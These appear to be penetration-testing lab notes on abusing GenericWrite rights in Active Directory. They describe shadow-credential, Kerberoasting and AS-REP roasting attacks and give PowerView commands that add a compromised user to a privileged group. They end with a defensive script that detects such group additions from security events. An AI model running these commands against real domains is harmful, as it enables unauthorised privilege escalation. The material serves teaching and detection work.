GenericWrite

Over a User

Attack
Description

Abuses write access to a user's or computer's msDS-KeyCredentialLink attribute to add authentication material and impersonate the account via PKINIT.

Requests a service ticket (TGS) for a specific SPN to extract and crack the associated service account’s NTLM hash.

Requests an AS-REP for a user without Kerberos pre-authentication, allowing offline cracking of their NTLM hash.

Over a Group

Adding Group Member

# creating a SecureString Object for the owned user
$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)

# add the compromised user to the group
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred -Verbose 

# confirm that damundsen was added to the group
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName
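The detection side of the group change above, as an added example that is not part of the original notes: it parses "member added to security-enabled group" events from a domain controller's Security log and flags an account adding itself or any addition to a watched group. The function name `Get-GroupAddFinding`, the `-WatchedGroups` parameter, and the sample event (DN, SIDs) are constructed for illustration; real events require the "Audit Security Group Management" subcategory to be enabled.

```powershell
# Added example (not from the original notes); the sample event XML is constructed.
# 4728 / 4732 / 4756: member added to a security-enabled global / local / universal group.
$GroupAddIds = 4728, 4732, 4756
function Get-GroupAddFinding {   # hypothetical helper name
    param(
        [Parameter(Mandatory)][string[]]$EventXml,
        [string[]]$WatchedGroups = @()   # hypothetical watch list of group names
    )
    foreach ($raw in $EventXml) {
        $doc = [xml]$raw
        $id  = [int]$doc.SelectSingleNode("//*[local-name()='EventID']").InnerText
        if ($id -notin $GroupAddIds) { continue }
        # Flatten the <Data Name="..."> elements into a lookup table.
        $d = @{}
        foreach ($n in $doc.SelectNodes("//*[local-name()='Data']")) {
            $d[$n.GetAttribute('Name')] = $n.InnerText
        }
        # MemberName is a DN, SubjectUserName a sAMAccountName: compare SIDs instead.
        $selfAdd = $d['MemberSid'] -eq $d['SubjectUserSid']
        $watched = $WatchedGroups -contains $d['TargetUserName']
        if ($selfAdd -or $watched) {
            [pscustomobject]@{
                EventId = $id
                Group   = '{0}\{1}' -f $d['TargetDomainName'], $d['TargetUserName']
                Actor   = '{0}\{1}' -f $d['SubjectDomainName'], $d['SubjectUserName']
                Member  = $d['MemberName']
                SelfAdd = $selfAdd
            }
        }
    }
}
# Constructed sample: the account that made the change is also the member added.
$sample = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4728</EventID></System>
  <EventData>
    <Data Name="MemberName">CN=damundsen,CN=Users,DC=INLANEFREIGHT,DC=LOCAL</Data>
    <Data Name="MemberSid">S-1-5-21-1111111111-2222222222-3333333333-1176</Data>
    <Data Name="TargetUserName">Help Desk Level 1</Data>
    <Data Name="TargetDomainName">INLANEFREIGHT</Data>
    <Data Name="SubjectUserSid">S-1-5-21-1111111111-2222222222-3333333333-1176</Data>
    <Data Name="SubjectUserName">damundsen</Data>
    <Data Name="SubjectDomainName">INLANEFREIGHT</Data>
  </EventData>
</Event>
'@
Get-GroupAddFinding -EventXml $sample -WatchedGroups 'Help Desk Level 1'
# Live use on a DC: -EventXml (Get-WinEvent -FilterHashtable @{LogName='Security'; Id=$GroupAddIds} | ForEach-Object { $_.ToXml() })
```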
